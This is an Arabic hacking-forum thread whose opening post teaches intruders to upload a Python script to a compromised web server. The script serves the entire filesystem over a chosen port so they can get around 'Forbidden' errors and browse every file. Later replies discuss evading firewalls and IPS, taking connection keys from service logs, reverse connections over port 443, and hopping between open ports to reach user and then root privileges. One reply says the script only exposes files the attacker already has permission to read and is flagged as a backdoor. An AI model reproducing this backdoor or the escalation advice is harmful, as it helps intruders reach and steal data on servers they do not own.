التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 05-13-2013, 07:07 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية ABO-SAGER
 

 

 
إحصائية العضو





ABO-SAGER غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
ABO-SAGER is on a distinguished road

افتراضي .:تخطي الفوربدين عن طريق فتح بورت:.


السلام عليكم ~

كيف الحال يا أحبتي في لله
~

اليوم معي شرح ان شاء الله راح يعجبكم
~

اليوم بإذن لله راح نتخطى الفوربدين العنيد مهما كانت قوته ~

شرط
~

ان يكون السيرفر قابل انك تفتح فيه بورت
~

اذا تبغا تعرف السيرفر يسمح انك تفتح بورت ولا لا جرب تسوي اتصال عكسي اذا نجح معك إن شاء 90% راح تتخطى ~

طيب نبدأ على بركة لله
~

الخطوة الأولى
~

نرفع السكربت التالي بمتداد
py ~


كود PHP:
#!/usr/bin/env python
# devilzc0de.org (c) 2012
import SimpleHTTPServer
import SocketServer
import os

port 
13123

if __name__=='__main__':
    
os.chdir('/')
    
Handler SimpleHTTPServer.SimpleHTTPRequestHandler

    httpd 
SocketServer.TCPServer((""port), Handler)

    print(
"Now open this server on webbrowser at port : " str(port))
    print(
"example: http://maho.com:" str(port))
    
httpd.serve_forever() 

هنا تضع البورت المراد فتحة في السيرفر ~

كود PHP:
port 13123 
الأن احفظ السكربت ورفعة على السيرفر ~

بمتداد py ولا تنسا تصرحه 0755 ~

قم بتشغيل السكربت عن طريق الأمر ~

كود PHP:
python aa.py 
الأن الصفحة راح تتطول في التحميل ~

اوك في هذي الحظة افتح صفحة جديدة في المتصفح وافتح رابط الموقع هكذا
~

كود PHP:
http://www.xxx.com:13123 

غير 13123 إلى البورت تبعك
~

والنتيجة ~




الأن تستطيع تصفح جميع ملفات السيرفر ~

وهذا الكونفيق
~




تم الشرح بوسطة ~

ABO-SAGER ~

ودمتم سالمين ^_^ ~



>:jo'd hgt,vf]dk uk 'vdr tjp f,vj:>

التوقيع

ABO-SAGER

 

   

رد مع اقتباس
قديم 05-13-2013, 07:23 PM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
الصورة الرمزية oblack
 

 

 
إحصائية العضو





oblack غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
oblack is on a distinguished road

افتراضي رد: .:تخطي الفوربدين عن طريق فتح بورت:.


اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة Abo-Sagre
السلام عليكم ~

كيف الحال يا أحبتي في لله
~

اليوم معي شرح ان شاء الله راح يعجبكم
~

اليوم بإذن لله راح نتخطى الفوربدين العنيد مهما كانت قوته ~

شرط
~

ان يكون السيرفر قابل انك تفتح فيه بورت
~

اذا تبغا تعرف السيرفر يسمح انك تفتح بورت ولا لا جرب تسوي اتصال عكسي اذا نجح معك إن شاء 90% راح تتخطى ~

طيب نبدأ على بركة لله
~

الخطوة الأولى
~

نرفع السكربت التالي بمتداد
py ~


كود PHP:
#!/usr/bin/env python
# devilzc0de.org (c) 2012
import SimpleHTTPServer
import SocketServer
import os

port 
13123

if __name__=='__main__':
    
os.chdir('/')
    
Handler SimpleHTTPServer.SimpleHTTPRequestHandler

    httpd 
SocketServer.TCPServer((""port), Handler)

    print(
"Now open this server on webbrowser at port : " str(port))
    print(
"example: http://maho.com:" str(port))
    
httpd.serve_forever() 

هنا تضع البورت المراد فتحة في السيرفر ~

كود PHP:
port 13123 
الأن احفظ السكربت ورفعة على السيرفر ~

بمتداد py ولا تنسا تصرحه 0755 ~

قم بتشغيل السكربت عن طريق الأمر ~

كود PHP:
python aa.py 
الأن الصفحة راح تتطول في التحميل ~

اوك في هذي الحظة افتح صفحة جديدة في المتصفح وافتح رابط الموقع هكذا
~

كود PHP:
http://www.xxx.com:13123 

غير 13123 إلى البورت تبعك
~

والنتيجة ~




الأن تستطيع تصفح جميع ملفات السيرفر ~

وهذا الكونفيق
~




تم الشرح بوسطة ~

ABO-SAGER ~

ودمتم سالمين ^_^ ~

طريقة رائعة للقيام بالاتصال العكسي ولكنها لاتجدي نفعا في السيرفرات القوية فا اغلب السيرفرات تقوم بتفعيل الفيرول ووضع رولز تمنع فتح اي بورت الفوربدين مشكلة صلاحيات فاذا كانت صلاحيتك اقل من يوزر بالسيرفر فالمشكلة تكون صعبه جدا

جاري تجريب طريقتك وتطويرها لتخطي عدد من الرولز التي تمنع فتح بورت بالاعتماد على بورتات مفتوحة بالسيرفر لخدمات اخرى و استغلالها بستخادم طريقة البايبنج وايضا المجيك باكيج وجراي تطوير برنامج بهذا الشئن ترقبونا

ملاحظة : استفدت من الفكرة كثيرا ورايح نقوم بتطويرها ان شاء الله بالقريب العاجل وجاري العمل من اللحظة .

   

رد مع اقتباس
قديم 05-13-2013, 08:58 PM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
الصورة الرمزية ABO-SAGER
 

 

 
إحصائية العضو





ABO-SAGER غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
ABO-SAGER is on a distinguished road

افتراضي رد: .:تخطي الفوربدين عن طريق فتح بورت:.


طيف هل في طريقة نعطل رولز

التوقيع

ABO-SAGER

 

   

رد مع اقتباس
قديم 05-13-2013, 10:24 PM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
الصورة الرمزية Cyber Code
 

 

 
إحصائية العضو








Cyber Code غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 11
Cyber Code is on a distinguished road

افتراضي رد: .:تخطي الفوربدين عن طريق فتح بورت:.


http://www.vbspiders.com/vb/t43175.html

كود:
طيف هل في طريقة نعطل رولز 
بارك الله فيك, موضوع جميل
التوقيع

if i gain something from being a hacker
it would be a background of almost every beautiful dream

and if you asked me what did you gain from being a member here

i'll honestly answer , it's a brothers for life


سبحان الله العظيم , سبحان الله وبحمده
استغفر الله العلي العظيم وأتوب إليه

 

   

رد مع اقتباس
قديم 05-14-2013, 01:38 AM   رقم المشاركة : 5 (permalink)
معلومات العضو
 
الصورة الرمزية oblack
 

 

 
إحصائية العضو





oblack غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
oblack is on a distinguished road

افتراضي رد: .:تخطي الفوربدين عن طريق فتح بورت:.


اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة Abo-Sagre
طيف هل في طريقة نعطل رولز

في اكثر من طريقة تعتمد حول فهمك للرولز المستخدمة في السيرفر ولكن اخطرها السيرفرات التي تستخدم هاردوير فايرول Ips هنا الوضع سيء جدا لانه يسجل كل الترفك بالشبكة و في حال رصدة لأي حركة مشبوهة يقوم على الفور بشكل ألي بوضع رولز جديدة لحجب الاتصال وتنبيه الدعم الفني لهذا يجب ان نعتمد على تخطي الرولز من خلال برامج يستخدمها السيرفر بشكل خدمات مثل smtp ftpssh telnet imap وغيرها من الخدمات .

حيث اني بالغالب اقوم بمحاولة الوصول الى اي ملف لوج لأحد هذه البرامج وسحب ال key الخاص بعملية الاتصال ومن ثم اقوم بعمل اتصال عكسي بنفس البورت المفتوح مستخدم نفس ال key الخاص بالبرنامج و القيام بعملية بايبنج من خلال ربط داينمك مع باقي الخدمات الاخرى بالسيرفر .

اما في حالة الكود الذي قمت بطرحة بالموضوع عليك بفحص بورتات الموقع فأذا وجدت بورت 443 الذي يستخدم غالبا حق ssl في هذه الحالة الامر بسيط اعمل اتصال من خلال البورت 443 , ولكني بالوقت الحالي ابحث عن طريقة الربط داينمك بين منفذ الى منفذ اخر لنفس السيرفر للحصول على صلاحية يوزر من خلال البرنامج الهدف .

   

رد مع اقتباس
قديم 05-14-2013, 02:04 AM   رقم المشاركة : 6 (permalink)
معلومات العضو
ReD-HaT
~|M4$T3R|~
 
الصورة الرمزية ReD-HaT
 

 

 
إحصائية العضو









ReD-HaT غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
ReD-HaT is on a distinguished road

افتراضي رد: .:تخطي الفوربدين عن طريق فتح بورت:.


موضوع في القمة
تحياتي لك

التوقيع

Vbspiders For Ever

mess with the best
die like rest

-----------------------------------
kevin-ffts@hotmail.fr
wep@hotmail.fr

 

   

رد مع اقتباس
قديم 05-14-2013, 06:55 AM   رقم المشاركة : 7 (permalink)
معلومات العضو
 
الصورة الرمزية ABO-SAGER
 

 

 
إحصائية العضو





ABO-SAGER غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
ABO-SAGER is on a distinguished road

افتراضي رد: .:تخطي الفوربدين عن طريق فتح بورت:.


اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة ReD-HaT
موضوع في القمة
تحياتي لك


الله يحيك
التوقيع

ABO-SAGER

 

   

رد مع اقتباس
قديم 05-14-2013, 06:56 AM   رقم المشاركة : 8 (permalink)
معلومات العضو
 
الصورة الرمزية ABO-SAGER
 

 

 
إحصائية العضو





ABO-SAGER غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
ABO-SAGER is on a distinguished road

افتراضي رد: .:تخطي الفوربدين عن طريق فتح بورت:.


اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة oblack
في اكثر من طريقة تعتمد حول فهمك للرولز المستخدمة في السيرفر ولكن اخطرها السيرفرات التي تستخدم هاردوير فايرول Ips هنا الوضع سيء جدا لانه يسجل كل الترفك بالشبكة و في حال رصدة لأي حركة مشبوهة يقوم على الفور بشكل ألي بوضع رولز جديدة لحجب الاتصال وتنبيه الدعم الفني لهذا يجب ان نعتمد على تخطي الرولز من خلال برامج يستخدمها السيرفر بشكل خدمات مثل smtp ftpssh telnet imap وغيرها من الخدمات .

حيث اني بالغالب اقوم بمحاولة الوصول الى اي ملف لوج لأحد هذه البرامج وسحب ال key الخاص بعملية الاتصال ومن ثم اقوم بعمل اتصال عكسي بنفس البورت المفتوح مستخدم نفس ال key الخاص بالبرنامج و القيام بعملية بايبنج من خلال ربط داينمك مع باقي الخدمات الاخرى بالسيرفر .

اما في حالة الكود الذي قمت بطرحة بالموضوع عليك بفحص بورتات الموقع فأذا وجدت بورت 443 الذي يستخدم غالبا حق ssl في هذه الحالة الامر بسيط اعمل اتصال من خلال البورت 443 , ولكني بالوقت الحالي ابحث عن طريقة الربط داينمك بين منفذ الى منفذ اخر لنفس السيرفر للحصول على صلاحية يوزر من خلال البرنامج الهدف .


مشاء الله عليك باين عليك خبرة في هذا المجال

بنتظارك بعد تتطوير الفكرة
التوقيع

ABO-SAGER

 

   

رد مع اقتباس
قديم 05-14-2013, 01:14 PM   رقم المشاركة : 9 (permalink)
معلومات العضو
vpn_31
Security
 
الصورة الرمزية vpn_31
 

 

 
إحصائية العضو








vpn_31 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
vpn_31 is on a distinguished road

افتراضي رد: .:تخطي الفوربدين عن طريق فتح بورت:.


تسلم على الطرح بس للأسف السيرفرات الحديثة مركبين فايرولات :(

التوقيع

d0nt mess with me ;)

 

   

رد مع اقتباس
قديم 05-19-2013, 11:00 PM   رقم المشاركة : 10 (permalink)
معلومات العضو
 
الصورة الرمزية oblack
 

 

 
إحصائية العضو





oblack غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
oblack is on a distinguished road

افتراضي رد: .:تخطي الفوربدين عن طريق فتح بورت:.


اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة ABO-SAGER
مشاء الله عليك باين عليك خبرة في هذا المجال

بنتظارك بعد تتطوير الفكرة

السلام عليكم اخواني قمت بدراسة الكود بشكل مفصل ومايحدث بالسيرفر للاسف الشديد هو لا يتخطى الفوربدين وانما يستعرض لك الملفات حسب الصلاحيات المتاحة لك وايضا ممكن الاستفادة منه في حال وجود بعض القيود على بورت 80 الخاص بتصفح من ناحية وجود صفحات انديكس تمنعك من رؤية الملفات الموجودة بالمجلد , الشيل costa cgi-station الذي عرضته بموضوعي السابق يحل هذه المشكلة وبطريقة افضل من فتح بورت لانه سوف تواجة مشكله بعد فتح البورت حيث يتعرف عليه نظام الحماية الموجود باللينكس خاصه بالاصدارات الحديثة وتصبح لديك مشكلة انتيرنل سيرفر ايرور مع العلم اني قمت بتجربته بسيرفر نظام اوبينتوا 11 وليس 12 .

وايضا لا يمكنك وضع بورت مفتوح بالسيرفر لان نظام الحماية مباشرة رايح يقوم بكتشاف الكود و تعرف عليه على انه باك دور .

اقوم لان بوضع المرحلة الثانيه من البحث لتطوير الفكرة بستخدام تقنية البايبنج وهيه تقنيه ليست بالسهله لاستغلال الصلاحية من خلال التنقل بين المنافذ المفتوحة واستغلال صلاحية البرامج للحصول على صلاحية يوزر ومن ثم صلاحية روت اتمنى من لدية الخبرة ان يساعدني في اتمام هذا البحث حتى افرغ منه بشكل اسرع .

   

رد مع اقتباس
قديم 05-25-2013, 12:53 AM   رقم المشاركة : 11 (permalink)
معلومات العضو
 
إحصائية العضو









القاتل المتسلسل غير متواجد حالياً

إرسال رسالة عبر Yahoo إلى القاتل المتسلسل

 

 

إحصائية الترشيح

عدد النقاط : 10
القاتل المتسلسل is on a distinguished road

افتراضي رد: .:تخطي الفوربدين عن طريق فتح بورت:.


طريقة ولا اروع مشكووور اخوي تستاهل تقييم

   

رد مع اقتباس
قديم 06-14-2013, 05:49 PM   رقم المشاركة : 12 (permalink)
معلومات العضو
KaLa$nikoV
VBSPIDERS TEAM

#~VoLc4n0~#

 
الصورة الرمزية KaLa$nikoV
 

 

 
إحصائية العضو







KaLa$nikoV غير متواجد حالياً

إرسال رسالة عبر MSN إلى KaLa$nikoV

 

 

إحصائية الترشيح

عدد النقاط : 11
KaLa$nikoV is on a distinguished road

افتراضي رد: .:تخطي الفوربدين عن طريق فتح بورت:.


بارك الله فيك
يعطيك الف عافيه

التوقيع



هل سأعود يوما
ام هي نهايه الطريق !!
إلهيْ ’ / أبدل عُسَرِنا يسُراً


لا تنسونا من دعائكم







سبحان الله والحمدلله ولا اله الا الله والله اكبر
fb.com/groups/VoLc4n0/
volc4n0@hotmail.com

 

   

رد مع اقتباس
قديم 06-28-2013, 12:29 AM   رقم المشاركة : 13 (permalink)
معلومات العضو
 
إحصائية العضو







V!rus Yasscom غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
V!rus Yasscom is on a distinguished road

افتراضي رد: .:تخطي الفوربدين عن طريق فتح بورت:.


مشكووووووووووور تسلللّم اخي بارك الله فيييك

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 05:56 PM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0